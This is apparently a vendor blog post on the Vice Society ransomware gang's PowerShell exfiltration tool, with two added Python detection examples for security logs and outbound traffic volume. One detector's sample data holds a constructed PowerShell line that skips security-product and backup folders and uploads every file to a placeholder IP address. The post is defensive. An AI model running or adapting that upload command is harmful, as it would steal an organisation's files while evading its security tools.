Vice Society Ransomware Gang Wields Custom PowerShell Tool for Data Exfiltration

Date:

April 18, 2023


The Vice Society ransomware gang has been observed using Living-off-the-Land (LotL) techniques by way of a custom PowerShell-based tool to automate data exfiltration on targeted networks.

LotL techniques abuse legitimate network tools and binaries to further attack progression while masking the operation as normal network activity to remain undetected.

“The tool also makes use of exclusion criteria to filter out system files, backups, and folders pointing to web browsers as well as security solutions from Symantec, ESET, and Sophos,” The Hacker News reported.
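The behaviours The Hacker News describes (recursive file enumeration, an exclusion list naming backup and security-vendor folders, and an upload step) are visible in PowerShell Script Block Logging (Event ID 4104) if it is enabled. The following is an added example, not code from the article or from Halcyon, that scores constructed 4104 script-block payloads against three such heuristics and flags a block only when at least two co-occur; the regexes, the sample blocks and the scoring threshold are assumptions for illustration, not a published signature.

```python
import re
from dataclasses import dataclass

# Constructed sample Script Block Logging (Event ID 4104) payloads (host, script text).
# They are invented for this example and are not the tool discussed in the article.
SAMPLE_SCRIPT_BLOCKS = [
    ("admin-ws01", r"Get-ChildItem C:\Logs -Filter *.log | Where-Object { $_.Length -gt 10MB }"),
    ("file-srv02", r"""$ex='Windows','Program Files','Symantec','ESET','Sophos','Backup','Chrome','Firefox'; """
                  r"""Get-ChildItem -Path D:\Shares -Recurse | Where-Object { $p=$_.FullName; -not ($ex | Where-Object { $p -like "*$_*" }) } | """
                  r"""ForEach-Object { Invoke-WebRequest -Uri http://203.0.113.10/upload -Method Post -InFile $_.FullName }"""),
    ("dev-ws07", r"Invoke-WebRequest -Uri https://example.org/tools.zip -OutFile tools.zip"),
]

# Heuristics (assumptions for this example). Each pattern stays within one pipeline
# segment ([^|\n]*) so that unrelated commands later in the script do not pair up.
RECURSIVE_ENUM = re.compile(r"\b(Get-ChildItem|gci)\b[^|\n]*-(Recurse|r)\b", re.I)
UPLOAD_CALL = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b[^|\n]*-(Method\s+Post|InFile)\b|\.UploadFile\(",
    re.I,
)
# Folder names a collection script would want to skip: security products and backups.
SECURITY_OR_BACKUP_NAMES = re.compile(r"\b(Symantec|ESET|Sophos|Backup)\b", re.I)
EXCLUSION_OPERATOR = re.compile(r"-not(like|match|contains|in)?\b|\bExclude\b", re.I)


@dataclass
class Finding:
    host: str
    indicators: list
    suspicious: bool


def analyze_script_block(host: str, script: str) -> Finding:
    """Return which heuristics fire for one script block and whether it crosses the threshold."""
    indicators = []
    if RECURSIVE_ENUM.search(script):
        indicators.append("recursive_enumeration")
    if UPLOAD_CALL.search(script):
        indicators.append("http_upload")
    # An exclusion list is only interesting when several security/backup names are
    # listed together with a negation operator, not when a name appears in passing.
    names = {m.group(1).lower() for m in SECURITY_OR_BACKUP_NAMES.finditer(script)}
    if len(names) >= 2 and EXCLUSION_OPERATOR.search(script):
        indicators.append("security_backup_exclusion")
    # Threshold of two co-occurring indicators (an assumption chosen to limit noise
    # from ordinary admin scripts that enumerate or upload on their own).
    return Finding(host, indicators, suspicious=len(indicators) >= 2)


def analyze_all(blocks) -> list:
    return [analyze_script_block(host, script) for host, script in blocks]


if __name__ == "__main__":
    for finding in analyze_all(SAMPLE_SCRIPT_BLOCKS):
        flag = "SUSPICIOUS" if finding.suspicious else "ok"
        print(f"{finding.host:<12} {flag:<10} {','.join(finding.indicators) or '-'}")
```

Only the second constructed block trips all three heuristics; the first (a log cleanup) and the third (a plain download) each match at most one and stay below the threshold. In practice the same logic would run over the 4104 events forwarded by your SIEM, and the vendor-name list should be extended to whatever endpoint products the organization actually runs.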

“The discovery of the data exfiltration script illustrates the ongoing threat of double extortion in the ransomware landscape. It also serves as a reminder for organizations to prioritize robust security protections and stay vigilant against evolving threats.”

Vice Society is a RaaS threat group that first emerged in 2021 and has used a variety of ransomware strains including Hello Kitty/Five Hands and Zeppelin before developing a custom ransomware strain. Tactics include attempts to compromise data backup solutions and clearing security logs on compromised systems to evade detection.

Vice Society is a more recent arrival on the ransomware scene and has been scaling their operations significantly, including a disruptive attack on the second largest school district in the US.

Vice Society has advanced evasion capabilities and can disable security tools like Windows Defender and evade sandbox analysis. The group is known to exploit vulnerabilities in public-facing applications and websites, exploits like PrintNightmare, or through compromised RDP credentials. Vice Society is known to use DLL side-loading techniques and abuse tools like Cobalt Strike, Mimikatz, SystemBC and PowerShell.  

Takeaway: The focus around ransomware attacks has always been centered on the delivery of the payload and encryption of data and systems, with the occasional data loss. But since most ransomware attacks today exfiltrate data first – with some threat actors, like BianLian and Karakurt, even skipping the encryption stage altogether – we need to start looking at these operations as straight-up data exfiltration attacks with some ransomware thrown in at the end of the attack.

These are multi-staged attacks in which the threat actors aim to infiltrate as much of the victim network as possible and exfiltrate sensitive data for extortion. In many cases, even if the victim pays a ransom, the attackers may demand an additional payment for the stolen data.

Remember that delivery of the ransomware payload occurs at the end of the attack sequence, after sensitive data has already been exfiltrated. Given how much effort goes into persistence, lateral movement, stealth, security evasion, and data exfiltration, we are simply not putting enough emphasis on these earlier stages in today’s ransomware attacks. There are days, weeks or potentially even months of detectable activity on the network prior to the final payload, and a lot of data is leaving the organization over the course of the attack.
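One of the detectable signals in that pre-payload window is the outbound volume itself: a file server that normally sends about a gigabyte a day does not suddenly send fifty without a reason. The following is an added example, not code from the article or from Halcyon, that baselines each host's daily egress from constructed flow summaries and raises an alert when a day exceeds a multiple of that host's own median; the record layout, thresholds and sample numbers are assumptions for illustration.

```python
from collections import defaultdict
from statistics import median

# Constructed daily egress summaries (host, day number, bytes sent outbound).
# Invented for this example; not real telemetry from any incident.
EGRESS = [
    ("file-srv02", 1, 1_200_000_000), ("file-srv02", 2, 1_000_000_000),
    ("file-srv02", 3, 1_400_000_000), ("file-srv02", 4, 1_100_000_000),
    ("file-srv02", 5, 48_000_000_000), ("file-srv02", 6, 52_000_000_000),
    ("admin-ws01", 1, 300_000_000), ("admin-ws01", 2, 400_000_000),
    ("admin-ws01", 3, 350_000_000), ("admin-ws01", 4, 300_000_000),
    ("admin-ws01", 5, 500_000_000),
]


def detect_egress_spikes(records, ratio=5.0, min_bytes=10_000_000_000, min_history=3):
    """Flag days where a host's outbound bytes exceed `ratio` x its own median baseline.

    Parameters (assumed defaults): `ratio` is the multiple of the baseline that
    counts as a spike, `min_bytes` an absolute floor so tiny hosts do not alert on
    noise, and `min_history` the number of quiet days needed before judging a host.
    """
    by_host = defaultdict(dict)
    for host, day, sent in records:
        by_host[host][day] = sent

    alerts = []
    for host, days in by_host.items():
        baseline_days = []  # bytes from days that were NOT themselves flagged
        for day in sorted(days):
            sent = days[day]
            if len(baseline_days) >= min_history:
                base = median(baseline_days)
                if sent >= ratio * base and sent >= min_bytes:
                    alerts.append({"host": host, "day": day, "bytes": sent,
                                   "baseline": base})
                    # Do not let the spike pollute the baseline for later days;
                    # otherwise a multi-day exfiltration becomes the new normal.
                    continue
            baseline_days.append(sent)
    return alerts


if __name__ == "__main__":
    for alert in detect_egress_spikes(EGRESS):
        gb = alert["bytes"] / 1e9
        base_gb = alert["baseline"] / 1e9
        print(f"{alert['host']} day {alert['day']}: {gb:.1f} GB out (baseline {base_gb:.2f} GB)")
```

With the constructed data, file-srv02 alerts on days 5 and 6 while admin-ws01 never does. Keeping flagged days out of the baseline matters for the slow, multi-day exfiltration the article describes: if day 5 were added to the history, day 6 would be compared against a median already dragged upward. A per-host baseline also avoids the false positives a single network-wide threshold would generate for hosts that are legitimately busy.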

The defense mindset here needs to shift to the left significantly, where we are addressing ransomware attacks first as an effort to prevent the attackers from exfiltrating data. We should really look at these attacks as data exfiltration events with the additional threat that ransomware could be deployed, as opposed to focusing too much on the tail end of the attack when the ransomware is delivered and the attack is already successful.

Resilience is key in developing a sound security posture, and organizations can limit the impact of a ransomware payload on operations with resilience planning, but once their data is compromised the attack becomes much more difficult to mitigate, as there is no guarantee the threat actors will honor any agreements even if they receive payment.

If the attackers have already exfiltrated the organization's most valuable data, then all those recovery efforts largely go out the window because the attack has already been successful.

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more.